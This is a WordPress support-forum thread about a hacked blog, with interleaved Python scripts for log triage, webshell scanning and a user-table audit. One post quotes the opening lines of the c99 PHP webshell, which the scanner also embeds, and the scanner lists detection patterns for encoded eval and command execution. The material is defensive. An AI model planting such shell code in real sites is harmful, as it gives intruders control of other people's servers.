[resolved] My WordPress Hacked (18 posts)

  1. Jonski
    Member
    Posted 7 years ago #

    v2.0.3

    I got an email from my WP site (wordpress@..
    --
    Subject: Password Lost/Change
    Password Lost and Changed for user: admin
    --
    I went to the site and couldn't log in. I tried to retrieve the password but got "Sorry, that user does not seem to exist in our database.", that user being Admin. I checked the database and I'm pretty sure the wp_users table was empty (I was in a bit of a panic, but pretty sure).

    On the site I then noticed the latest post had been edited to...
    --
    hax vs YOU
    hax was here, hax fucked you, please no 3war ras

    همود يهبيني؟ [Arabic; roughly "Hmood loves me?", with the verb misspelled]
    --
    which seemed to sum up the situation.

    Back to the database; I now see one user, admin, email listed as upx@dynamicz.org and user registered 2006-06-09 16:07:10. I have now changed that account and regained access but I see no reason why they shouldn't be able to do whatever they did again whenever they want.

    I need to know how this happened, I have a few wordpress sites and this could happen to any at any time...

    anyone have any ideas?

  2. whooami
    Member
    Posted 7 years ago #

    There are a few more things that anyone trying to help/stop repeat occurrences would need to know:

    OS (flavor and kernel version if *nix-based, obviously), PHP version, MySQL version, whether or not you have contacted your host, what they said, any other software installed on that domain/whatever, was it touched..

    Also, Matt/Dougal/someone has set up a special email addy for those sorts of reports:

    http://wordpress.org/about/contact/

    middle of the way down..

    security@wordpress.org

    If it were me, I would get all the above info (most of it is available on the left side of your cPanel) and send off an email.

  3. whooami
    Member
    Posted 7 years ago #

    As an aside, dynamicz.org is a real domain, for those that haven't already checked (all ONE of you) :P and while there does appear to be some "Arab" influence on the site (check the forums) I couldn't locate that username (upx) anywhere -- not to say it doesn't exist.

  4. Jonski
    Member
    Posted 7 years ago #

    The hacked site is something not yet live (although it is online) so I have decided to leave it for a bit so you can have a look.
    PHP info here
    http://www.footyclub.com/info.php

    The WP site is at
    http://www.footyclub.com/football/

    I just want to find out what happened so I can stop it happening to my other WP sites that are live.

    I will send that email - cheers.

  5. whooami
    Member
    Posted 7 years ago #

    I for one would be VERY interested in seeing your Apache logs.. unfortunately there's no telling without a good scouring to know exactly when that was done, or is there?
    Assuming that post dated June 13 was edited.. when's the last time you actually checked that site? Has it been a month?

    IF you do archive your Apache logs (some do, some don't; it's an option in cPanel) I would LOVE to take a close look at your Apache logs for June (if in fact you think that's when that happened; July, obviously, if you think that's when it happened).

    If you are OK with that, and have them archived, feel free to contact me whoo AT village-idiot DOT org. Rest assured, I wouldn't share anything I find without your prior approval.

    Good luck either way, and take care!
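    The "good scouring" of the Apache logs that whooami asks for is mostly a matter of pulling out the handful of requests that matter for this incident: the lost-password flow against wp-login.php, the POST to wp-admin/post.php that rewrote the post, and any PHP file being served from a place PHP should never run (wp-content/uploads). The script below is an added example, not code from this thread or from WordPress. The log lines are constructed in Apache's default combined format; the /football/ prefix follows the site layout in the thread, and the IP addresses and timestamps are invented.

```python
"""Triage an Apache combined-format access log for the WordPress events
discussed in this thread. Added example; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample. 198.51.100.7 plays the attacker; 203.0.113.5 is a normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jul/2006:09:01:12 +0000] "GET /football/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jul/2006:14:20:01 +0000] "GET /football/wp-login.php?action=lostpassword HTTP/1.1" 200 1934 "-" "Mozilla/4.0"
198.51.100.7 - - [13/Jul/2006:14:20:09 +0000] "POST /football/wp-login.php?action=lostpassword HTTP/1.1" 302 0 "http://www.footyclub.com/football/wp-login.php?action=lostpassword" "Mozilla/4.0"
198.51.100.7 - - [13/Jul/2006:14:23:44 +0000] "POST /football/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.7 - - [13/Jul/2006:14:25:10 +0000] "POST /football/wp-admin/post.php HTTP/1.1" 302 0 "http://www.footyclub.com/football/wp-admin/post.php?action=edit&post=12" "Mozilla/4.0"
198.51.100.7 - - [13/Jul/2006:14:27:33 +0000] "GET /football/wp-content/uploads/c99.php HTTP/1.1" 200 45211 "-" "Mozilla/4.0"
203.0.113.5 - - [13/Jul/2006:15:02:00 +0000] "GET /football/?p=12 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the name of the rule a parsed request trips, or None if it is uninteresting."""
    parts = urlsplit(entry["path"])
    path = parts.path
    action = parse_qs(parts.query).get("action", [""])[0]
    if path.endswith("/wp-login.php"):
        # The lost-password / reset flow that produced the "Password Lost/Change" mail.
        if action in ("lostpassword", "retrievepassword", "resetpass", "rp"):
            return "password_reset"
        if entry["method"] == "POST":
            return "login_post"          # a credential submission, useful as a timeline marker
        return None
    if path.endswith("/wp-admin/post.php") and entry["method"] == "POST":
        return "post_edit"               # the request that rewrote the existing post
    if "/wp-content/uploads/" in path and path.endswith(".php"):
        return "php_in_uploads"          # PHP executing from the uploads tree: almost always a dropped shell
    return None


def triage(log_text):
    """Return the interesting requests, in log order, as dicts."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rule = classify(entry)
        if rule:
            findings.append({"ts": entry["ts"], "ip": entry["ip"], "rule": rule,
                             "status": entry["status"], "path": entry["path"]})
    return findings


def suspect_ips(findings, min_rules=2):
    """IPs that tripped at least min_rules distinct rules; one rule alone is often a legitimate user."""
    rules_by_ip = defaultdict(set)
    for f in findings:
        rules_by_ip[f["ip"]].add(f["rule"])
    return sorted(ip for ip, rules in rules_by_ip.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']}  {f['ip']:<15} {f['rule']:<15} {f['status']} {f['path']}")
    print("suspects:", suspect_ips(found))
```

    Run it against the real file with `triage(open("access_log").read())`; the point of `suspect_ips` is that a password reset or a post edit on its own is normal, while one address doing the reset, the login, the edit and then fetching a PHP file from uploads within a few minutes is the whole story in four lines.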

  6. Jonski
    Member
    Posted 7 years ago #

    It happened today, they edited an existing post.

    I have to go now but I will see if I can get the logs later and contact you. Thanks.

  7. FredAdi
    Member
    Posted 7 years ago #

    I had my WordPress blog hacked last week.... we worked out the only realistic reason was that the blog was created using Fantastico, which is a cPanel plugin. If you happen to use the same username/password as your FTP during your Fantastico WordPress install, it seems there is a security flaw.

  8. Jonski
    Member
    Posted 7 years ago #

    I'm back! I was away a little longer than expected. My logs are not archived! I've never looked before; if I had looked on the day they would have been there, but I just presumed they would be there for more than a day. Oops.

    Although I did use it once, I am fairly sure I didn't use Fantastico with this install.

    It is a bit worrying. There is nothing to stop it happening again.

  9. manstraw
    Member
    Posted 7 years ago #

    Can't stop it if you don't know how it happened. He might have cracked into MySQL. Perhaps a plugin let him in.

    I would ask that you have your account moved to another server. Perhaps that one was already compromised, or perhaps it now has a compromise left behind.

  10. 21stproject
    Member
    Posted 7 years ago #

    Your blog was hacked? That sucks.

    Just thought I'd mention this in case anyone's interested: that little bit of Arabic seems to be saying

    Hmood Loves Me

    I'm pretty sure that's what it's saying even though the person has misspelled the words.

  11. JerryWho
    Member
    Posted 7 years ago #

    I was hacked 13 times in a row.

    They used an index.php file with the following code:

    <?php
    if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
    error_reporting(5);
    @ignore_user_abort(TRUE);
    @set_magic_quotes_runtime(0);
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    define("starttime",getmicrotime());
    if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
    $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
    foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

    $shver = "1.0 pre-release build #16"; //Current version
    if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
    elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
    else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
    }

    $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

    etc.

    The fellow even created an email and altered my cPanel email address... I suspect he came through the WordPress On Demand Backup Plugin.

    Any ideas?
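    The fragment JerryWho posted is the preamble of the c99 webshell, and it is recognisable by behaviour, not just by the `c99sh_surl` cookie name: it merges `$_COOKIE`, `$_GET` and `$_POST` into one array and then does `$$k = $v` for every key, which re-creates `register_globals` so the rest of the shell can read attacker-supplied variables by name, and it calls `ignore_user_abort(TRUE)` so a long command keeps running after the browser disconnects. The scanner below is an added example, not code from this thread or from WordPress; it looks for those traits plus a couple of generic webshell patterns (eval of a base64/gzip payload, command execution) that go beyond what the thread shows. `C99_SAMPLE` is a copy of the lines posted above, `BENIGN_SAMPLE` and the weights and threshold are the author's assumptions, not a vendor signature set.

```python
"""Flag PHP files that look like webshells, using the traits of the c99
fragment posted above plus a few generic indicators. Added example."""
import os
import re
import tempfile

# (description, pattern, weight). Weights and the threshold are assumptions.
INDICATORS = [
    ("c99 cookie/variable prefix", re.compile(r"c99sh"), 5),
    ("cookie, GET and POST merged into one request array",
     re.compile(r"array_merge\(\s*\$_COOKIE\s*,\s*\$_GET\s*,\s*\$_POST\s*\)"), 3),
    # "$$k = $v" over request data turns every request key into a PHP variable,
    # i.e. register_globals re-implemented by the shell itself.
    ("register_globals emulation ($$k = $v)", re.compile(r"\$\$\w+\s*=\s*\$\w+"), 3),
    ("keeps running after the client disconnects",
     re.compile(r"ignore_user_abort\(\s*(TRUE|true|1)\s*\)"), 1),
    ("disables magic quotes at runtime", re.compile(r"set_magic_quotes_runtime\(\s*0\s*\)"), 1),
    ("eval/assert of a decoded payload",
     re.compile(r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 5),
    ("command execution", re.compile(r"\b(system|exec|shell_exec|passthru|proc_open|popen)\s*\("), 2),
]
LIKELY_SHELL = 5   # a single exec() call (weight 2) does not trip this on its own

# Copy of the lines posted in this thread (the c99 preamble), trimmed to the behavioural part.
C99_SAMPLE = r'''<?php
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 pre-release build #16";
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"];}
'''

# Constructed harmless plugin, to show the scanner does not fire on ordinary code.
BENIGN_SAMPLE = r'''<?php
/* Plugin Name: Hello Example (constructed) */
function hello_example_footer() { echo esc_html( get_option( 'hello_example_text', 'hi' ) ); }
add_action( 'wp_footer', 'hello_example_footer' );
'''


def scan_source(text):
    """Score one PHP source text. Each indicator adds its weight once, however often it matches."""
    hits, score = [], 0
    for name, rx, weight in INDICATORS:
        n = len(rx.findall(text))
        if n:
            hits.append((name, n))
            score += weight
    return {"score": score, "likely_shell": score >= LIKELY_SHELL, "hits": hits}


def scan_tree(root, exts=(".php", ".phtml", ".php5", ".inc")):
    """Walk a document root and return (path, result) for every file over the threshold."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
                if result["likely_shell"]:
                    flagged.append((path, result))
    return flagged


if __name__ == "__main__":
    # Drop the two samples into a throwaway directory and scan it like a web root.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        with open(os.path.join(root, "wp-content", "uploads", "index.php"), "w") as fh:
            fh.write(C99_SAMPLE)
        with open(os.path.join(root, "hello-example.php"), "w") as fh:
            fh.write(BENIGN_SAMPLE)
        for path, result in scan_tree(root):
            print(f"{path}: score {result['score']}")
            for name, n in result["hits"]:
                print(f"    {n}x {name}")
```

    Point `scan_tree` at the document root of every account on the box, not just the blog that was defaced: as manstraw notes further up, a shell left anywhere on a shared server is enough to come back through. Treat any hit under wp-content/uploads as confirmed, since nothing legitimate puts PHP there.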

  12. RyuMaou
    Member
    Posted 7 years ago #

    Why would you suspect that plugin was the culprit?

    I mean, without logs to trace anything, the attacker could have compromised the server and gotten at you via a PHP hack. I'm not disagreeing with you, but I'd be interested in how you figured it out.

  13. JerryWho
    Member
    Posted 7 years ago #

    I have 5 WordPress blogs running on my server; the only blog that was hacked was the one with the plug-in activated.

    I experimented with switching the plug-in off and activating it on another one, and sure enough, the one with the plug-in activated was hacked.

    So, yeah, I must say I found out the hard way.

  14. JerryWho
    Member
    Posted 7 years ago #

    Dear RyuMaou:

    Someone else made the same observation:

    http://wordpress.org/support/topic/85036?replies=23#post-435367

  15. RyuMaou
    Member
    Posted 7 years ago #

    Interesting....
    Do you mind sharing what version of the plugin you're using? It is the one from skippy dot net, right?

    I'm asking because I've had some problems in the past with someone hitting my site via a PHP injection attack of some kind and, while I "fixed" the problem, I never did figure out how they were doing it. (In my case, I adjusted the directory permissions on the blog directories and that shut down the attacker.)

    Thanks!

  16. JerryWho
    Member
    Posted 7 years ago #

    It's the one that came with the standard installation of WordPress 2.0.4.

    Which directory did you alter permissions on, may I ask?

  17. RyuMaou
    Member
    Posted 7 years ago #

    As I recall, most of them, but most especially the wp-content directory and everything under it. Makes it hard to edit plugins and themes live, but, at the time, it seemed a good trade off.
    In light of this, I may check versions of the backup plugin and re-enable permissions on the plugins and themes directories.

    Did you update your backup plugin? And, was it effective? I know it hasn't been long since you had the problem, but I've found that these little blighters don't have anything better to do and come back soon and often.
    Hopefully, your problems have been resolved, though.

  18. etechsupport
    Member
    Posted 7 years ago #

    Also, you should immediately disable user registration if it is enabled for guests to leave comments.
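    Two of the checks in this thread are database checks: Jonski's look at wp_users for the admin account that should not be there (post 1), and etechsupport's advice to turn off open registration. The script below is an added example, not code from this thread or from WordPress, that runs both against a copy of the tables. It uses an in-memory SQLite stand-in for the MySQL tables, with rows constructed here: the admin login, its upx@dynamicz.org address and the 2006-06-09 registration date are taken from post 1, while the "hax" account, the editor account, the trusted domain footyclub.com and the "known clean" date are assumptions. The column names, the serialized `wp_capabilities` meta value and the `users_can_register` / `default_role` options are the real WordPress ones; against a live site, point the same queries at the MySQL connection.

```python
"""Audit WordPress user and option tables for the two problems discussed in
this thread: an administrator you do not recognise, and open registration.
Added example; the data is constructed (see the lead-in)."""
import sqlite3

SCHEMA = """
CREATE TABLE wp_users    (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_options  (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
"""

# Constructed rows. Roles live in wp_usermeta as a PHP-serialized array under {prefix}capabilities.
USERS = [
    (1, "admin",  "upx@dynamicz.org",     "2006-06-09 16:07:10"),   # from post 1
    (2, "jonski", "editor@footyclub.com", "2006-06-09 16:30:00"),   # assumed legitimate editor
    (3, "hax",    "hax@example.net",      "2006-07-13 14:21:00"),   # assumed attacker-created admin
]
USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]
OPTIONS = [
    (1, "users_can_register", "1"),            # open registration: what post 18 says to switch off
    (2, "default_role", "subscriber"),
    (3, "siteurl", "http://www.footyclub.com/football"),
]


def load_sample():
    """Build the in-memory stand-in for the three WordPress tables."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", USERS)
    con.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", USERMETA)
    con.executemany("INSERT INTO wp_options VALUES (?,?,?)", OPTIONS)
    return con


def audit(con, trusted_domains, clean_as_of, prefix="wp_"):
    """Return (kind, subject, detail) tuples for every administrator whose mail domain is not
    trusted or who was registered after the last time the site was known clean, plus option
    settings that let strangers create accounts."""
    findings = []
    admins = con.execute(
        f"SELECT u.ID, u.user_login, u.user_email, u.user_registered "
        f"FROM {prefix}users u JOIN {prefix}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = ? AND m.meta_value LIKE '%\"administrator\"%'",
        (prefix + "capabilities",),
    ).fetchall()
    for _uid, login, email, registered in admins:
        domain = email.rsplit("@", 1)[-1].lower()
        if domain not in trusted_domains:
            findings.append(("admin_untrusted_email", login, email))
        if registered > clean_as_of:               # MySQL DATETIME text sorts chronologically
            findings.append(("admin_registered_after_clean", login, registered))
    opts = dict(con.execute(
        f"SELECT option_name, option_value FROM {prefix}options "
        f"WHERE option_name IN ('users_can_register', 'default_role')").fetchall())
    if opts.get("users_can_register") == "1":
        findings.append(("open_registration", "users_can_register", "1"))
    if opts.get("default_role", "subscriber") != "subscriber":
        findings.append(("privileged_default_role", "default_role", opts["default_role"]))
    return findings


def close_registration(con, prefix="wp_"):
    """Apply the last reply's advice: stop anonymous sign-ups (same as unticking it in Options)."""
    con.execute(f"UPDATE {prefix}options SET option_value = '0' WHERE option_name = 'users_can_register'")
    con.commit()


if __name__ == "__main__":
    db = load_sample()
    for kind, subject, detail in audit(db, {"footyclub.com"}, "2006-07-01 00:00:00"):
        print(f"{kind:<30} {subject:<20} {detail}")
    close_registration(db)
    print("after fix:", audit(db, {"footyclub.com"}, "2006-07-01 00:00:00"))
```

    Note what the audit cannot tell you: whether the `admin` row is the original account with its e-mail swapped or a fresh row recreated after the table was emptied, which is exactly the ambiguity Jonski describes. That is a question for the Apache logs and a database backup from before the incident, not for the current tables.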

Topic Closed

This topic has been closed to new replies.
